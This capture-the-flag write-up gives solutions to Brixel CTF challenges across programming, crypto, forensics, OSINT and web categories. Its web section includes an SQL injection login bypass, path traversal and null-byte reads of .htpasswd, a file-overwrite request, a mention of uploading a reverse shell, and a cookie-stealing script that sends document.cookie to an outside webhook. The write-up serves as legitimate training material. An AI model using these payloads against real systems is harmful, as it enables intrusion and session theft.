---
tags: 'CTF'
---
Brixel CTF Winter Edition
===
:::info
<i class="fa fa-user-circle-o" aria-hidden="true"></i> @codeskill
<i class="fa fa-clock-o" aria-hidden="true"></i> 2020-12-26
<i class="fa fa-external-link" aria-hidden="true"></i> https://ctf.brixel.space/
:::
[TOC]
## Programming
### Are you fast enough?
![](https://i.imgur.com/RFMewDl.png)
`solve.sh`
```bash=
#!/bin/bash
curl -s http://timesink.be/speedy/ -X POST -d inputfield=$(curl -s http://timesink.be/speedy/index.php -c cookie.txt | grep -oP '(?<=div id="rndstring" align="center">).*(?=<\/div><br>)' | tr -d "\n" | tr -d -) -b cookie.txt
```
`./solve.sh`
```htmlembedded=
<html><body><div align="center"><h1>Are you fast enough?</h1></div><hr><div align="center">You took: 0 second(s) to complete the task.</div><br><div align="center">Congratulations, you completed the task in under 1 seconds!</div><div algin="center">The flag is: <b>brixelCTF{sp33d_d3m0n}</b></div></body></html>%
```
`solve.py`
```python3=
import requests
import re
t = "http://timesink.be/speedy"
s = requests.Session()
print(f"Requesting {t}...")
req = s.get(t)
p = re.compile('<div id="rndstring" align="center">(\w*)</div>')
random_str = p.search(req.text).group(1)
print(f"Got randomstring: {random_str}")
print(f"Posting...")
r2 = s.post("http://timesink.be/speedy/index.php", data={"inputfield": random_str})
print(r2.text)
```
:::success
brixelCTF{sp33d_d3m0n}
:::
### Keep walking
`solve.py`
```python=
x = 1
y = 1
previous_answer = 1
answer = x * y + previous_answer + 3
while (x < 525):
x = x + 1
y = y + 1
previous_answer = answer
answer = x * y + previous_answer + 3
print ("answer="+str(answer))
print ("previous_answer="+str(previous_answer))
print ("x="+str(x))
print ("y="+str(y))
print ("formula: "+str(answer)+"="+str(x)+"*"+str(y)+"+"+str(previous_answer)+"+"+"3")
```
```python3=
x = 1
y = 1
prev_answer = 1
answer = None
while x <= 525:
answer = x*y + prev_answer + 3
print(f"{x = } ==> {answer = }")
x += 1
y += 1
prev_answer = answer
```
:::success
brixelCTF{48373851}
:::
### A song...
Copy the song and paste into https://codewithrockstar.com/online
![](https://i.imgur.com/3F3hXuY.png)
:::success
brixelCTF{5667236346614}
:::
### An arduino project
### Quizbot
```python3
import requests
import json
from bs4 import BeautifulSoup as bs4
################################################################################
#
# Stage 1:
#
# Request a session for the first "round", in this, we'll submit a lot of wrong
# answers and store the resulting solution given to us by the server. The plan
# is to use this solutions in a second round to solve the questions
#
########################################
# question_mapping maps the question to it's answer
# load the stored data
question_mapping = {}
with open("solutions.json") as data:
question_mapping = json.load(data)
s1 = requests.Session()
s1.close()
s1 = requests.Session()
#for i in range(0, 2000):
i=0
while len(question_mapping) < 1000:
print(f"\r{i}\t{len(question_mapping)}", end="", flush=True)
r = s1.get("http://timesink.be/quizbot/index.php")
soup = bs4(r.text, "html.parser")
question = soup.h4.text
# post with body:
payload = {"insert_answer": "asdfghjkl", "submit": "answer"}
r = s1.post("http://timesink.be/quizbot/index.php", data=payload)
soup = bs4(r.text, "html.parser")
answer = soup.find(id="answer").text
question_mapping[question] = answer
i+=1
# save the dict to json
with open("solutions.json", "w") as outfile:
json.dump(question_mapping, outfile)
print("")
################################################################################
#
# Stage 2:
#
# Use the solutions collected in stage 1
#
########################################
s2 = requests.Session()
for i in range(0, 1100):
try:
r = s1.get("http://timesink.be/quizbot/index.php", timeout=10)
soup = bs4(r.text, "html.parser")
question = soup.h4.text
try:
answer = question_mapping[question]
except:
answer = "abc"
print(question)
print(answer)
except:
print("SOME ERROR OCCURED")
try:
# post with body:
payload = {"insert_answer": answer, "submit": "answer"}
r = s1.post("http://timesink.be/quizbot/index.php", data=payload, timeout=10)
soup = bs4(r.text, "html.parser")
print(r.text)
#answer = soup.find(id="answer").text
except:
print("SOME ERROR OCCURED")
```
:::success
brixelCTF{kn0wl3dg3}
:::
## Forensics
### Message from Space
https://ourcodeworld.com/articles/read/956/how-to-convert-decode-a-slow-scan-television-transmissions-sstv-audio-file-to-images-using-qsstv-in-ubuntu-18-04
Download the app > `Robot32 - SSTV Image Decoder`
Listen the wav file and wait for the render image
SSTV in Scottie1-Mode
![](https://i.imgur.com/vpNg8h4.png)
:::success
brixelCTF{SP4C3L4B}
:::
### Lottery Ticket
- Picture of lottery ticket
- If you zoom in you see compression artifacts around most numbers
- Edited numbers got none, sum them together --> Flag is "203"
:::success
brixelCTF{203}
:::
### Lost evidence
foremost extract .wav
decode the dtmf in the wave file
you get the transaction reason
`cocaine`
:::success
brixelCTF{cocaine}
:::
## OSINT
### Visit Limburg #1
https://www.google.com/maps/d/viewer?mid=13WdFG3f5N8YGKQ6tTO4XTcxZlwFZ2Dgq&ll=50.693156402179554%2C5.707086178620777&z=16
### Visit Limburg #2
3.05.13
`7.05.09`
https://www.google.com/maps/@50.9409526,5.4027559,3a,32.9y,53.72h,88.17t/data=!3m7!1e1!3m5!1spIOYm_3knO82AWp-QKjpBg!2e0!5s20130601T000000!7i13312!8i6656
### Visit Limburg #3
https://www.openstreetmap.org/search?query=airport%20in%20limburg#map=11/51.0996/5.4437
### Physical
https://www.bipt.be/operators/publication/database-with-reserved-and-allocated-numbers
https://osintframework.com/
### A quick search
Google Lens o Yandex images
![](https://i.imgur.com/owPHhV2.jpg =200x300)
Eben-Ezer Tower
:::success
brixelCTF{Eben-Ezer}
:::
### Manhunt (1-n)
Facts:
- https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/
- https://twitter.com/johnnydorfmeis1
- http://www.howitshould.be
- https://github.com/JohnnyDorfmeister
1. `Johnny Dorfmeister`: Taken from the EXIF-data of the image
2. `pishapasha`: Googling the name takes you to this Linkedin-profile: https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/
3. fav food: `macaroni`
Taken from https://www.instagram.com/JohnnyDorfmeister/
4. bday: tbd
5. `w@yb@ck!`: Using the wayback-machine: https://web.archive.org/web/20190115103029/http://www.howitshould.be/test-page/ (Taken from his twitter-account @johnnydorfmeis1)
6. `poetry`: Translate the russian text on howitshould.be with google.
7. Fill in the contact form and his address will be presented
8. "just_married": With google street view on the address from no. 7, move back in time
9. `g1ttern00b`: Username "johnny", Password "letmein" taken from old commit on github
## Reverse Engineering / cracking
### Cookieee!
Cheatengine
search for the cookie amount
increase it
done
### noPEEKing
strings on the exe
### registerme.exe
strings on exe
create a file called register.key
start the exe
### android app
## Old tech
### punchcard
uploda the punchcard here:
https://www.masswerk.at/cardreader/
:::success
brixelCTF{M41NFR4M3}
:::
### Goodbye old friend
Download the SWF
Extract the content
then again
search through the files till you find the flag
### The tape
## Crypto
### Sea code
message.wav
![](https://i.imgur.com/9nGiYNw.png)
```
- .... . ..-. .-.. .- --. ..-. --- .-. - .... .. ... -.-. .... .- .-.. .-.. . -. --. . .. ... ... . .- --. ..- .-.. .-..
```
![](https://i.imgur.com/4LN8Pj3.png)
theflagforthischallengeis seagull
:::success
brixelCTF{seagull}
:::
### Merde
vigenere with "confidentiel" as the key:
```
The flag is
```
`brixelCTF{baguette}`
### Merda
rot 21
`brixelCTF{pizzanapoli}`
### s̸͖̾̀͊͠h̸̜̒ï̷̧̲͙̭̤͛͒̋t̷̢̲͚͖̑͜
base64 decode + binary decode
`brixelCTF{robocop}`
### Scheiße
qbhbh zrmua gfbld ocqbv
![](https://i.imgur.com/KqqSGVd.png)
derflagistsauerkraut
the flag is sauerkraut
:::success
brixelCTF{sauerkraut}
:::
### flawed
Username:admin
Passwordhash:d269ce15f9c44bc3992a5f4e5f273e06
![](https://i.imgur.com/7tUIaj8.png)
:::success
brixelCTF{notsecure}
:::
### Don't be salty
```python3=
import hashlib
for a in range(97, 122):
for b in range(97, 122):
for c in range(97, 122):
for d in range(97, 122):
for e in range(97, 122):
pw = chr(a) + chr(b) + chr(c) + chr(d) + chr(e)
pw += "04532@#!!"
print(pw, hashlib.md5(pw.encode('utf-8')).hexdigest())
```
:::success
brixelCTF{brute}
:::
## Steganography
### Doc-ception
unzip loremipsum.docx
unzip loremipsum
cat flag.txt
flag = openxml
:::success
brixelCTF{openxml}
:::
### Limewire audio
`Audacity > Spectrogram`
![](https://i.imgur.com/vlmas35.png)
:::success
brixelCTF{hellokitty}
:::
### Scan Me
- qr-code image
- crop smaller qr-code image from first
- go to website, scan barcode
- enter result, scan next barcode, repeat
- receive flag: brixelCTF{m4st3r_0f_sc4n5}
:::success
brixelCTF{m4st3r_0f_sc4n5}
:::
### Rufus the vampire cat
`steghide info rufus.jpg`
```
"rufus.jpg":
format: jpeg
capacity: 8.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "steganopayload639.txt":
size: 85.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
```
`steghide extract -sf rufus.jpg`
```
Enter passphrase:
wrote extracted data to "steganopayload639.txt".
```
`less steganopayload639.txt`
```
You thought this was a cute cat picture? NOPE! Chuck Testa! (the flag is:
chucktesta)
```
:::success
brixelCTF{chucktesta}
:::
## Internet
### Easy
```
curl -s https://ctf.brixel.space/ | grep -i flag
<!-- hidden flag: 'brixelCTF{notsosecret}' -->
```
:::success
brixelCTF{notsosecret}
:::
### Discord
5: Reading the rules gets you this flag: brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}
:::success
brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}
:::
### Hidden Code
https://www.brixel.be/
View page source code and find `konami`
/* <![CDATA[ */
var wpee_config = {"type":"konami","custom_code":"9","action":"move_image_across_middle","custom_js":"alert('test');","image":"http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif"};
/* ]]> */
http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif
![](https://i.imgur.com/hsQTDHS.png =200x200)
:::success
brixelCTF{Mario}
:::
### Hiding in the background
```htmlembedded=
<style>
body{color: #FFFFFF; background-color: #000000; background-image: url("/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg"); background-repeat: repeat; background-size: 50%;}
</style>
```
wget https://ctf.brixel.space/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg
strings ctfbg.svg | grep -i ctf
sodipodi:docname="ctfbg.svg">
style="fill:#000000;fill-opacity:1;stroke-width:0.264583">brixelCTF{happy_holidays}</tspan></text>
:::success
brixelCTF{happy_holidays}
:::
### Readme
https://ctf.brixel.space/guide
:::success
brixelCTF{freepoints}
:::
### robotopia
http://timesink.be/robotopia/robots.txt
:::success
brixelCTF{sadr0b0tz}
:::
### login1
plain text in javascript source
:::success
brixelCTF{w0rst_j4v4scr1pt_3v3r!}
:::
### login2
![](https://i.imgur.com/k2U4rqm.png)
```javascript=
function verify() {
password = "brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}"
split = 6;
if (password.substring(0, split) == 'brixel')
{
if (password.substring(split*6, split*7) == '180790')
{
if (password.substring(split, split*2) == 'CTF{st')
{
if (password.substring(split*4, split*5) == '5cr1pt')
{
if (password.substring(split*3, split*4) == 'd_j4v4')
{
if (password.substring(split*5, split*6) == '_h3r3.')
{
if (password.substring(split*2, split*3) == '1ll_b4')
{
if (password.substring(split*7, split*8) == '54270}')
{
console.log("Password Verified")
}
}
}
}
}
}
}
}
else
{
console.log("Incorrect password");
}
}
verify()
```
:::success
brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}
:::
### login3
http://timesink.be/login3/password.txt
:::success
brixelCTF{n0t_3v3n_cl05e_t0_s3cur3!}
:::
### login4
http://timesink.be/login4/password.txt + base64 decode
:::success
brixelCTF{even_base64_wont_make_you_secure}
:::
### login5
```javascript!
function verify() {
var _0x41653e = _0x58ab;
password = document[
_0x41653e(0x194)
](_0x41653e(0x192))['value'],
alphabet = _0x41653e(0x193),
newpassword = alphabet['substr'](0x1, 0x1), // b
newpassword = newpassword + alphabet['substr'](0x11, 0x1), // r
newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
newpassword = newpassword + alphabet['substr'](0x17, 0x1), // x
newpassword = newpassword + alphabet['substr'](0x4, 0x1), // e
newpassword = newpassword + alphabet['substr'](0xb, 0x1), // l
newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
newpassword = newpassword + alphabet['substr'](39 - 0x2, 0x1), // {
newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
newpassword = newpassword + alphabet['substr'](0x1, 0x1), // b
newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
newpassword = newpassword + alphabet['substr'](0x14, 0x1), // u
newpassword = newpassword + alphabet['substr'](0x12, 0x1), // s
newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
newpassword = newpassword + alphabet['substr'](0x0, 0x1), // a
newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
newpassword = newpassword + alphabet['substr'](0xd, 0x1), // n
newpassword = newpassword + alphabet['substr']39 - 0x1, 0x1), // }
password == newpassword ? alert(_0x41653e(0x196)) : alert(_0x41653e(0x195));
}
```
:::success
brixelctf{0bfuscati0n}
:::
### Browsercheck
Google search to identify user-agent used by "ask jeeves crawler"
`curl 'http://timesink.be/browsercheck/' -H 'User-Agent: Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)'`
```
<html><body><div align="center"><h1>congratulations</h1>the flag is 'brixelCTF{askwho?}'</div></body></html>
```
:::success
brixelCTF{askwho?}
:::
### SnackShack awards
```!
curl 'http://timesink.be/snackshackaward/stemmen.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://timesink.be' -H 'Connection: keep-alive' -H 'Referer: http://timesink.be/snackshackaward/index.html' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'score_bammens=0&score_omejan=0&score_fontainas=0&score_tpleintje=5000&score_frietuurtje=0'
```
:::success
brixelCTF{bakpau}
:::
### Flat earth
brute force usname and login here: http://timesink.be/flatearth/admin.php
```
' OR ''=' --
```
:::success
brixelCTF{aroundtheglobe}
:::
### Dadjokes
Upload reverse shell here:
http://timesink.be/dadjokes/jokes/submit.php
File Read:
http://timesink.be/dadjokes/jokes/read.php?file=mugged.txt
`http://timesink.be/dadjokes/jokes/submit.php?filename=%3C?php%20echo%20\`
```!
Notice: Undefined index: title in /home/kevinay5/domains/timesink.be/public_html/dadjokes/jokes/submit.php on line 47
please provide a title
```
The Solution is to fix the Page. This gives you the solution
```
curl 'http://timesink.be/dadjokes/jokes/submit.php?filename=../index.html&title=index&submit=true&content=%0D%0A%3Chtml%3E%3Ctitle%3EDadJokes%2C+your+source+of+lame+dad+jokes%3C%2Ftitle%3E%3Cbody%3E%3
Cdiv+align%3D%22center%22%3E%3Ch1%3EDadJokes%3C%2Fh1%3E%3Chr%3E%3Cimg+src%3D%22images%2Fbanner.png%22+alt%3D%22dadjokes%22%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fread.php%22%3ERead+dad+jokes%3C%2Fa%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fsubmi
t.php%22%3Esubmit+your+own+jokes%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fhtml%3E'
```
`document.write('<img src="https://webhook.site/#!/0129c597-c633-4ef5-b4bb-c2ee2a805adc?cookie=' + document.cookie + '" />')`
### Pathfinders \#1
The index.php is used to load files without any limit, so only access:
`http://timesink.be/pathfinder/index.php?page=admin/.htpasswd`
:::success
brixelCTF{unsafe_include}
:::
### Pathfinders \#2
The index.php is used to load files without any limit, so only access:
`http://timesink.be/pathfinder2/index.php?page=admin/.htpasswd%00.php`
:::success
brixelCTF{outdated_php}
:::